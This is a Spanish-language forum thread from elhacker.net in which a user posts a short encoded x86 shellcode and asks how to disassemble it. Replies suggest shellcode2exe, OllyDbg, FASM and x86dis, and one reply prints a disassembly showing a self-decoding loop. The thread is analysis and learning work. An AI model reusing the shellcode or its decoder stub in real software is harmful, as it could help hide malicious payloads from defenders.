elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  ASM (Moderador: Eternal Idol)
| | | |-+  .:. Shellcode 2 ASM .:.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: .:. Shellcode 2 ASM .:.  (Leído 10,348 veces)
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
.:. Shellcode 2 ASM .:.
« en: 2 Enero 2011, 22:47 pm »

Bueno, perdonadadme el titulo, un poco estafalario xD...
Bueno, mi duda es...
Tengo una shellcode, y me gustaria saber las intstrucciones en ensamblador que tiene... Como hago eso?
Para el que lo quiera saber, mi shellcode es:
Código
  1. \xeb\x12\x31\xc9\x5e\x56\x5f\xb1\x15\x8a\x06\xfe\xc8\x88\x06\x46\xe2"
  2.          "\xf7\xff\xe7\xe8\xe9\xff\xff\xff\x32\xc1\x32\xca\x52\x69\x30\x74\x69"
  3.          "\x01\x69\x30\x63\x6a\x6f\x8a\xe4\xb1\x0c\xce\x81
Bueno, es para analizarla.. Ocupa bastante pocos bytes, va a ser interesante xD...
Bueno, es pasar eso a ensamblador... como?


En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
xassiz~


Desconectado Desconectado

Mensajes: 457



Ver Perfil WWW
Re: .:. Shellcode 2 ASM .:.
« Respuesta #1 en: 2 Enero 2011, 23:17 pm »

¿Un desensamblador?


En línea

Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: .:. Shellcode 2 ASM .:.
« Respuesta #2 en: 2 Enero 2011, 23:58 pm »

Negativo pues no esta compilado xD...
Como lo compilo ? Quiero decir, la shellcode sola...
 :P :P :P
En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
CronuX

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: .:. Shellcode 2 ASM .:.
« Respuesta #3 en: 3 Enero 2011, 00:14 am »

Simple cojes cualquier exe, lo abres con el OllyDBG y buscas una zona en blanco, es decir llena de 00 y modificas por los bytes que tienes en la shellcode y miras que instrucciones son y que hace... saludos
En línea

3mp3z@ndo

Desconectado Desconectado

Mensajes: 51


Ver Perfil
Re: .:. Shellcode 2 ASM .:.
« Respuesta #4 en: 3 Enero 2011, 00:43 am »

Puedes pasarte por aqui:

http://sandsprite.com/shellcode_2_exe.php

o por aqui:

http://www.data0.net/?page_id=618

Conviertes tu shellcode a exe, te lo descargas y lo metes por ejemplo en el olly y tendrás algo como esto

Código:
00401020   . /EB 12         JMP SHORT shellcod.00401034
00401022   $ |31C9          XOR ECX,ECX
00401024   . |5E            POP ESI                                  ;  kernel32.7C816FE7
00401025   . |56            PUSH ESI
00401026   . |5F            POP EDI                                  ;  kernel32.7C816FE7
00401027   . |B1 15         MOV CL,15
00401029   > |8A06          MOV AL,BYTE PTR DS:[ESI]
0040102B   . |FEC8          DEC AL
0040102D   . |8806          MOV BYTE PTR DS:[ESI],AL
0040102F   . |46            INC ESI
00401030   .^|E2 F7         LOOPD SHORT shellcod.00401029
00401032   .-|FFE7          JMP EDI                                  ;  ntdll.7C920228
00401034   > \E8 E9FFFFFF   CALL shellcod.00401022
00401039   .  32C1          XOR AL,CL
0040103B   .  32CA          XOR CL,DL
0040103D   .  52            PUSH EDX                                 ; ntdll.KiFastSystemCallRet
0040103E   .  6930 74690169 IMUL ESI,DWORD PTR DS:[EAX],69016974
00401044   .  3063 6A       XOR BYTE PTR DS:[EBX+6A],AH
00401047   .  6F            OUTS DX,DWORD PTR ES:[EDI]               ;  I/O command
00401048   .  8AE4          MOV AH,AH
0040104A   .  B1 0C         MOV CL,0C
0040104C   .  CE            INTO
0040104D   .  8100 00000000 ADD DWORD PTR DS:[EAX],0

O si te quieres ahorrar la conversión puedes hacer lo que te ha dicho cronux, copias los bytes de tu shellcode directamente en un ejecutable y después lo metes en el olly.

También puedes descargar el Malcode Analysis Pack de idefense donde entre otras herramientas tienes el shellcode2exe para montartelo en local y no depender de ninguna web, te dejo el enlace:

http://labs.idefense.com/software/malcode.php#more_malcode+analysis+pack

Saludos


« Última modificación: 3 Enero 2011, 00:59 am por 3mp3z@ndo » En línea

Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: .:. Shellcode 2 ASM .:.
« Respuesta #5 en: 3 Enero 2011, 12:01 pm »

Bueno, gracias por las respuestas, pero el sistema que uso es linux y me convierte a un Windows. Y Wine no puede hacer nada :o :o
Alguna idea?
En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
SnakingMax

Desconectado Desconectado

Mensajes: 167



Ver Perfil WWW
Re: .:. Shellcode 2 ASM .:.
« Respuesta #6 en: 3 Enero 2011, 13:18 pm »

Debes reemplazar los '\' con '0' y ensamblarlo con FASM que está disponible para Linux tambien:
Citar
En línea

Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: .:. Shellcode 2 ASM .:.
« Respuesta #7 en: 3 Enero 2011, 13:21 pm »

Muchas gracias jaja ahora mismo lo pruebo...
Aparte, he econtrado otra cosa por si esa no me va xD...
http://blogs.udp.cl/obtener-c%C3%B3digo-assembler-de-un-shellcode-desde-el-terminal

Mea culpa por no buscar bien...
En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
SnakingMax

Desconectado Desconectado

Mensajes: 167



Ver Perfil WWW
Re: .:. Shellcode 2 ASM .:.
« Respuesta #8 en: 3 Enero 2011, 13:27 pm »

Ok, ya comentas como te fue  :)
En línea

Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: .:. Shellcode 2 ASM .:.
« Respuesta #9 en: 3 Enero 2011, 16:40 pm »

Comento que no me fue  :-\
El fasm no me compila xD... me echas una manita ?
lo modifique pero nada ...

Y mi metodo no me va. Cosa curiosa:
http://blogs.udp.cl/obtener-c%C3%B3digo-assembler-de-un-shellcode-desde-el-terminal
Código:
echo -ne "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" | x86dis -e 0 -s intel
OK, code de acuerdo...
Código:
echo -ne "\xeb\x12\x31\xc9\x5e\x56\x5f\xb1\x15\x8a\x06\xfe\xc8\x88\x06\x46\xe2\xf7\xff\xe7\xe8\xe9\xff\xff\xff\x32\xc1\x32\xca\x52\x69\x30\x74\x69\x01\x69\x30\x63\x6a\x6f\x8a\xe4\xb1\x0c\xce\x81" | x86dis -e 0 -s intel
Pum pum pum...
Código:
jmp 0x00000014
Que hago? Muchas gracias de todos modos. Alguna idea?
En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Vb6 shellcode help ayuda :(
Análisis y Diseño de Malware
Harmmy 9 7,466 Último mensaje 7 Agosto 2012, 18:44 pm
por Harmmy
Programar mi propio shellcode
Hacking
Borito30 0 1,948 Último mensaje 30 Diciembre 2016, 02:14 am
por Borito30
Shellcode to HEX (BOF)
ASM
GGZ 5 5,447 Último mensaje 28 Enero 2017, 20:49 pm
por xv0
Ejecutar shellcode en C
Programación C/C++
mester 3 2,639 Último mensaje 4 Marzo 2017, 13:51 pm
por integeroverflow
[MSF] Modificar un shellcode
Análisis y Diseño de Malware
4v1dy4 8 7,700 Último mensaje 15 Enero 2023, 00:28 am
por 4v1dy4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines